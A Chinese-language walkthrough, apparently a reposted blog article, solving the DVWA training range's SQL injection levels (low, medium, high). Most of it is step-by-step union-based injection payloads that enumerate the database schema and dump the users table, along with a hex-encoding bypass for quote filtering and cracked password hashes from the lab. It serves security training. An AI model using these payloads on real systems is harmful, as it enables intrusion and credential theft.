DVWA靶场通关之SQL Injection

本文主要是介绍DVWA靶场通关之SQL Injection，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

SQL Injection

以下ip均为dwva靶场的ip地址，这里我搭建在虚拟机win2008中

一. low

1. 求闭合字符

• 输入1

 1' and 1=1 #

• 可能存在单引号sql注入

2. 求列数

1' and 1=1 order by 2# 

1' and 1=1 order by 3# 

• 说明有两列

3. 求显示位

1' and 1=2 union select 1,2 #

4. 爆数据名

1' and 1=2 union select 1,database() #

• 数据库名为dvwa

• 查询一下数据库名

1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata) #

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hA2XDmLD-1626704824931)(实验三.assets/image-20210622163600637.png)]

5. 爆表名

1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') #

• 判断users表示想要的用户名密码表

6. 爆列名

1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users') #

7. 爆字段名

1' and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users) #

用户名：admin

密码：5f4dcc3b5aa765d61d8327deb882cf99 解密：password

用户名：gordonb

密码：e99a18c428cb38d5f260853678922e03 解密：abc123

用户名：1337

密码：8d3533d75ae2c3966d7e0d4fcc69216b 解密：charley 等

二. medium

html 锚点，# 表示返回当前页面

• 想到利用burpsuite修改数据包中的信息

1. 求闭合字符

 id=1 and 1=1 //正确

id=1 and 1=2 //错误

• 发现是数字型sql注入

2. 求列数

id=1 order by 2

id=1 order by 3

• 发现有2列

3. 求显示位

id=1 and i=2 union select 1,2

4. 爆数据库名

id=1 and 1=2 union select 1,database()

• 数据库名为dvwa

• 查询一下数据库名

id=1 and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata)

• 有dvwa数据库

5. 爆表名

id=1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') //报错,发现单引号被过滤，这里可以使用database()或者转换成16进制ascii码
id=1 and 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()//正确

6. 爆列名

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273//转换成16进制ascii码 

7. 爆字段名

id=1 and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users)

用户名：admin

密码：5f4dcc3b5aa765d61d8327deb882cf99 解密：password

用户名：gordonb

密码：e99a18c428cb38d5f260853678922e03 解密：abc123

用户名：1337

密码：8d3533d75ae2c3966d7e0d4fcc69216b 解密：charley

三. high

1.求闭合字符

id=1'//报错
id=1' and 1=1 #//正确
id=1' and 1=2 #//错误

• 判断出来是单引号字符型注入

2.求列数

1' and 1=1 order by 2# 

1' and 1=1 order by 3# 

• 判断是有两列

3. 求显示位

1' and 1=2 union select 1,2 #

4. 爆数据库名

1' and 1=2 union select 1,database() #

• 数据库名为dvwa
• 查询一下数据库名

1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata) #

5. 爆表名

1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') #

• 判断users表示想要的用户名密码表

6.爆列名

1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users') #

7. 爆字段名

1' and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users) #

用户名：admin

密码：5f4dcc3b5aa765d61d8327deb882cf99 解密：password

用户名：gordonb

密码：e99a18c428cb38d5f260853678922e03 解密：abc123

用户名：1337

密码：8d3533d75ae2c3966d7e0d4fcc69216b 解密：charley 等

这篇关于DVWA靶场通关之SQL Injection的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---